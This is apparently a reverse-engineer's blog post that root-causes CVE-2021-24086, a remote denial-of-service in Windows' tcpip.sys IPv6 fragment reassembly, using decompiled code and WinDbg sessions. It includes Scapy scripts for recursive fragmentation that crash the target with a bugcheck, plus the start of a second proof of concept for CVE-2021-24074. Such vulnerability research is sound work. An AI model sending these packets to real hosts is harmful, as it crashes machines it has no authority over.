Packet_t is an undocumented structure that is associated with received packets. A bunch of state is stored in this structure and figuring out the semantics of important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions reads and updates it during parsing.

NetBufferList = Packet->NetBufferList;
FirstNetBuffer = NetBufferList->FirstNetBuffer;
CurrentMdl = FirstNetBuffer->CurrentMdl;
if ( (CurrentMdl->MdlFlags & 5) != 0 )
Va = CurrentMdl->MappedSystemVa;
else
Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
if ( Protocol == (Protocol_t *)Ipv4Global )
{
// ...
}
else
{
}


The function does a lot more; it initializes several Packet_t fields but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns back in IppReceiveHeaderBatch, it extracts a demuxer off the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (term used in the driver).

struct Demuxer_t
{
void (__fastcall *Parse)(Packet_t *);
void *f0;
void *f1;
void *Size;
void *f3;
_BYTE gap[23];
};

struct Protocol_t
{
// ...
Demuxer_t Demuxers[277];
};


NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

If the demuxer is handling an extension header, then a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't a header in which case it handles the next packet.

while ( ... )
{
NetBufferList = RcvList->NetBufferList;
if ( ... )
{
Demuxer = (Demuxer_t *)IpUdpEspDemux;
}
else
{
Demuxer = &Protocol->Demuxers[IpProto];
}
Demuxer = 0;
if ( Demuxer )
Demuxer->Parse(RcvList);
else
RcvList = RcvList->Next;
}


Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come handy later.

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions


Demuxer can expose a callback routine for parsing which I called Parse. The Parse method receives a Packet and it is free to update its state; for example to grab the NextHeader that is needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList looks like (Ipv6FragmentDemux.Parse):

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.

The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit more, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
fields_desc = [ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None)]


The most important fields for us are :

• offset which tells the start offset of where the data that follows this header should be placed in the reassembled packet
• the m bit that specifies whether or not this is the latest fragment.

Note that the offset field is an amount of 8 bytes blocks; if you set it to 1, it means that your data will be at +8 bytes. If you set it to 2, they'll be at +16 bytes, etc.

Here is a small ghetto IPv6 fragmentation function I wrote to ensure I was understanding things properly. I enjoy learning through practice. (Scapy has fragment6):

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
'''Ghetto fragmentation.'''
assert (frag_size % 8) == 0
leftover = bytes
offset = 0
frags = []
while len(leftover) > 0:
chunk = leftover[: frag_size]
leftover = leftover[len(chunk): ]
last_pkt = len(leftover) == 0
# 0 -> No more / 1 -> More
m = 0 if last_pkt else 1
assert offset < 8191
pkt = Ether() \
/ IPv6(dst = target) \
/ IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
/ chunk

offset += (len(chunk) // 8)
frags.append(pkt)
return frags


Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes the unfragmentable part: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It also is the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part. Easy, the fragmentable part is what you are sending behind the fragmentation header. The reassembly process is the process of stitching together the unfragmentable part with the reassembled fragmentable part into one beautiful reassembled packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.

At this point, I felt I had accumulated enough new information and it was time for zooming back in into the target. We want to verify that reality works like the literature says it does and by doing we will improve our overall understanding. After studying this code for a while we start to understand the big lines. The function receives a Packet but as this structure is packet specific it is not enough to track the state required to reassemble a packet. This is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up in three main parts; again no need for us to understand every single details, let's just understand it conceptually and what/how it tries to achieve its goals:

• 1 - Figure out if the received fragment is part of an already existing Reassembly. According to the literature, we know that network stacks should use the source address, the destination address as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup):
int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
//...
Protocol = *(_QWORD *)(Iface + 40);
OffsetSrcIp = 12i64;
AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
if ( Protocol != Ipv4Global )
H = RtlCompute37Hash(
g_37HashSeed,
Pkt + OffsetSrcIp,
OffsetDstIp = 16i64;
if ( Protocol != Ipv4Global )
H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
// ...
v5 = *(_QWORD *)Iface;
Context.Signature = 0;
HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
*OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
;
CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
{
// If we have walked through all the entries in the hash-table,
// then we can just bail.
if ( !CurrentReassembly )
return 0;
// If the current entry matches our iface, pkt id, ip src/dst
// then we found a match!
if ( CurrentReassembly->Iface == Iface
&& CurrentReassembly->Identification == Identification
&& memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
&& memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
{
break;
}
}
// ...
return CurrentReassembly;
}

• 1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.
Reassembly_t *IppCreateInReassemblySet(
PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
if ( Reassembly )
{
IppInsertReassembly((__int64)SpinLock, Reassembly);
KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
KeReleaseSpinLockFromDpcLevel(SpinLock);
}
else
{
KeReleaseSpinLock(SpinLock, NewIrql);
}
return Reassembly;
}


• 2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.

• 2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
Reassembly->UnfragmentableLength = UnfragmentableLength;
if ( UnfragmentableLength )
{
UnfragmentableData = ExAllocatePoolWithTagPriority(
(POOL_TYPE)512,
UnfragmentableLength,
'erPI',
LowPoolPriority
);
Reassembly->UnfragmentableData = UnfragmentableData;
if ( !UnfragmentableData )
{
// ...
goto Bail_0;
}
// ...
// Copy the unfragmentable part of the packet inside the pool
// buffer that we have allocated.
RtlCopyMdlToBuffer(
FirstNetBuffer->MdlChain,
Reassembly->UnfragmentableData,
Reassembly->UnfragmentableLength,
v51);
}
*(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}

• 3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.

At this stage we have an OK understanding of the data structures involved to keep track of groups of fragments and how/when reassembly gets kicked off. We've also commented and refined various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
//...
UnfragmentableLength = Reassembly->UnfragmentableLength;
TotalLength = UnfragmentableLength + Reassembly->DataLength;
// Below is the added code by the patch
if ( TotalLength > 0xFFF ) {
// Bail
}


How cool is that? That's really rewarding. Putting in a bunch of work that may feel not that useful at the time, but eventually adds up, snow-balls and really moves the needle forward. It's just a slow process and you gotta get used to it; that's just how the sausage is made.

Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to start getting back on this BSoD. After reading Ipv6pReassembleDatagram a few times I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime to see if this could give me any hints. The first one didn't seem to do anything, but the second one bug-checked the machine with a NULL dereference, bingo that is looking good!

After carefully analyzing the crash I've started to realize that the potential issue has been hiding in plain sight in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
// ...
const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
// …
NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
IppReassemblyNetBufferListsComplete,
Reassembly,
0i64,
0i64,
0,
0);
if ( !NetBufferList )
{
// ...
goto Bail_0;
}

FirstNetBuffer = NetBufferList->FirstNetBuffer;
if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
{
// ...
goto Bail_1;
}

//...
*Buffer = Reassembly->Ipv6;


NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
if ( CurrentMdlOffset < Amount )
return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
Nb->DataOffset -= Amount;
Nb->DataLength += Amount;
Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
return 0;
}


Because the FirstNetBuffer just got allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer triggers a call to NdisRetreatNetBufferDataStart which is publicly documented. According to the documentation, it should allocate an MDL using NetioAllocateMdl as the network buffer is empty as we mentioned above. One thing to notice is that the amount of bytes, HeaderAndOptionsLength, passed to NetioRetreatNetBuffer is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )


Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, it needs to get a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as to gain access to a contiguous block of data from a NET_BUFFER structure. After reading the documentation several time, it was a little bit confusing to me so I figured I'd throw NDIS in IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
return 0i64;
// ...


Just looking at the beginning of the implementation something stands out. As NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the following condition NetBuffer->DataLength < BytesNeeded when HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. HeaderAndOptionsLength is 0x1337, so NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes, and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now let's imagine that HeaderAndOptionsLength is 0x31337. This means that NetioRetreatNetBuffer allocates 0x1337 (because of the truncation) bytes but calls NdisGetDataBuffer with 0x31337 which makes the call fail because the network buffer is not big enough and we hit this condition NetBuffer->DataLength < BytesNeeded.

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;


This is where it should bugcheck. As usual we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

from scapy.all import *
first = Ether() \
/ IPv6(dst = 'ff02::1') \
/ IPv6ExtHdrFragment(id = id, m = 1, offset = 0) \
/ UDP(sport = 0x1122, dport = 0x3344) \
/ '---frag1'
second = Ether() \
/ IPv6(dst = 'ff02::1') \
/ IPv6ExtHdrFragment(id = id, m = 0, offset = 2) \
/ '---frag2'
sendp([first, second], iface='eth1')


Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff80011844478)]

kd>
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
NBL                ffffc107f7be1d90    Next NBL           NULL
First NB           ffffc107f7be1f10    Source             NULL
Pool               ffffc107f58ba980 - NETIO
Flags              NBL_ALLOCATED

Walk the NBL chain                     Dump data payload
Show out-of-band information           Display as Wireshark hex dump

; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
NB                 ffffc107f7be1f10    Next NB            NULL
Length             0                   Source pool        ffffc107f58ba980
First MDL          0                   DataOffset         0
Current MDL        [NULL]              Current MDL offset 0

View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff80011691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800117cde4a 85c0            test    eax,eax

; The first NB now has 0x28 bytes backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
NB                 ffffc107f7be1f10    Next NB            NULL
Length             0n40                Source pool        ffffc107f58ba980
First MDL          ffffc107f5ee8040    DataOffset         0n56
Current MDL        [First MDL]         Current MDL offset 0n56

View associated NBL

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff80011844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......


All right, so it sounds like we have a plan - let's get to work.

Manufacturing a packet of the death: chasing phantoms

Well... sending a packet with a large header should be trivial right? That's initially what I thought. After trying various things to achieve this goal, I quickly realized it wouldn't be that easy. The main issue is the MTU. Basically, network devices don't allow you to send packets bigger than like ~1200 bytes. Online content suggests that some ethernet cards and network switches allow you to bump this limit. Because I was running my test in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64k.

The issue with that is that Hyper-V didn't allow me to do that. The only parameter I found allowed me to bump the limit to about 9k which is very far from the 64k I needed to trigger this issue. At this point, I felt frustrated because I felt I was so close to the end, but no cigar. Even though I had read that this vulnerability could be thrown over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it meant it had to go through regular network equipment and there was no way a 64k packet would work. But I ignored this hard truth for a bit of time.

Eventually, I accepted the fact that I was probably heading the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not the one that I would be able to trigger with packets thrown from the Internet. Maybe though there might be another code-path having a very similar pattern (retreat + NdisGetDataBuffer) that would result in a bugcheck. I've noticed that the TotalLength field is also truncated a bit further down in the function and written in the IPv6 header of the packet. This header is eventually copied in the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16b.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that, the size from the IPv6 header is smaller than
// the real total size. It's kinda hard to see how this would cause subsequent
// issue but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;


My theory was that there might be some code that would read this Ipv6.length (which is truncated as __ROR2__ expects a uint16_t) and something bad might happen as a result. Although, the length would end up having a smaller value than the actual real size of the packet; it was hard for me to come up with a scenario where this would cause an issue but I still chased this theory as this was the only thing I had.

What I started to do at this point is to audit every demuxer that we saw earlier. I looked for ones that would use this length field somehow and looked for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically so I also heavily used WinDbg to verify my work. I used hardware breakpoints to track access to those two bytes but no hit. Ever. Frustrating.

After trying and trying I started to think that I might have been headed in the wrong direction again. Maybe, I really need to find a way to send such a large packet without violating the MTU. But how?

Manufacturing a packet of the death: leap of faith

All right so I decided to start fresh again. Going back to the big picture, I've studied a bit more the reassembly algorithm, diffed again just in case I missed a clue somewhere, but nothing...

Could I maybe be able to fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we could use reassembly as a primitive to stitch fragments together; so instead of trying to send a very large fragment maybe we could break down a large one into smaller ones and have them stitched together in memory. It honestly felt like a long leap forward, but based on my reverse-engineering effort I didn't really see anything that would prevent that. The idea was blurry but felt like it was worth a shot. How would it really work though?

Sitting down for a minute, this is the theory that I came up with. I created a very large fragment that has many headers; enough to trigger the bug assuming I could trigger another reassembly. Then, I fragmented this fragment so that it can be sent to the target without violating the MTU.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
]) \
# ....
/ IPv6ExtHdrDestOpt(options = [
]) \
/ IPv6ExtHdrFragment(
id = second_pkt_id, m = 1,
nh = 17, offset = 0
) \
/ UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)


The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; that's great as I didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff8010a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
NB                 ffff800fa2a46f10    Next NB            NULL
Length                10020            Source pool        ffff800fa06ba240
First MDL          ffff800fa0eb1180    DataOffset         0n56
Current MDL        [First MDL]         Current MDL offset 0n56

View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
NBL                ffff800fa2a46d90    Next NBL           NULL
First NB           ffff800fa2a46f10    Source             NULL
Pool               ffff800fa06ba240 - NETIO
Flags              NBL_ALLOCATED

Walk the NBL chain                     Dump data payload
Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
MDL ffff800fa0eb1180
ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  ·····<@········
ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

...

MDL ffff800f9ff5e8b0
ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

...

MDL ffff800fa0937280
ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·


What we see above is the reassembled first fragment.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
]) \
# ...
/ IPv6ExtHdrDestOpt(options = [
]) \
/ IPv6ExtHdrFragment(
id = second_pkt_id, m = 1,
nh = 17, offset = 0
) \
/ UDP(dport = 31337, sport = 31337, chksum=0x7e7f)


It is a fragment that is 10020 bytes long, and you can see that the ndiskd extension walks the long MDL chain that describes the content of this fragment. The last MDL is the header of the UDP part of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this trigger another reassembly?

Well, let's see if the below works I guess:

reassembled_pkt_2 = Ether() \
/ IPv6(dst = args.target) \
/ IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
/ 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)


Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8054a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8054a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd>
tcpip!Ipv6pReassembleDatagram+0xce:
fffff8054a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd>
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff8054a5cde42 498bce          mov     rcx,r14

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff8054a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff8054a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff8054a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd>
tcpip!Ipv6pReassembleDatagram+0xed:
fffff8054a5cde59 41b901000000    mov     r9d,1

kd>
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff8054a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd>
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff8054a5cde64 4533c0          xor     r8d,r8d

kd>
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff8054a5cde67 498bce          mov     rcx,r14

kd>
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff8054a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff8054a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff8054a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
(0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805473c46a0 cc              int     3

kd> kc
# Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
11 NDIS!ndisMIndicateNetBufferListsToOpen
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup


Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Morale of the day: don't leave any rocks unturned, follow your intuitions and reach the state of no unknowns.

Conclusion

In this post I tried to take you with me through my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver found by Microsoft own's @piazzt. From zero to remote BSoD. The PoC is available on my github here: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers as it is a fairly long and hairy post, but if you made it all the way there you should join and come hang in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people enjoying low level subjects. Hopefully we can also generate more interest for external contributions :)

Last but not least, special greets to the usual suspects: @yrp604 and @__x86 and @jonathansalwan for proof-reading this article.

Bonus: CVE-2021-24074

Here is the Poc I built based on the high quality blogpost put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
'''
kd> g
oob?
fffff804453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
kd> p
fffff804453c6f7e 498bd5          mov     rdx,r13
kd> db @r13
ffffb90e85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
kd> dqs @r13 l1
ffffb90e85b78220  ffffb90e85b782c0
kd> p
fffff804453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff8044541f2e0)]
kd>
fffff804453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804453b5164)
kd> db @rdx
kd> p
fffff804453c6f8d 84c0            test    al,al
kd> r.
al=0000000000000000  al=0000000000000000
kd> p
fffff804453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804453c7473)
kd>
fffff804453c6f95 498bcd          mov     rcx,r13
kd>
Breakpoint 3 hit
fffff804453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff80445354f84)
kd> dqs @rcx l1
ffffb90e85b78220  ffffb90e85b782c0

Call-stack (skip first hit):
kd> kc
# Call Site
02 tcpip!Ipv4pReassembleDatagram
0a nt!KeExpandKernelStackAndCalloutInternal
0b nt!KeExpandKernelStackAndCalloutEx

Snippet:
{
// ...
// kd> db @rax
